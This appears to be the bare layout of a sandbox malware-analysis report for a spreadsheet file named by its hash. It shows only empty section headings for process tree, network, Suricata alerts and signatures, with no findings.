9e227b07643afd3444c4d30f0c47c3cf.xls

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All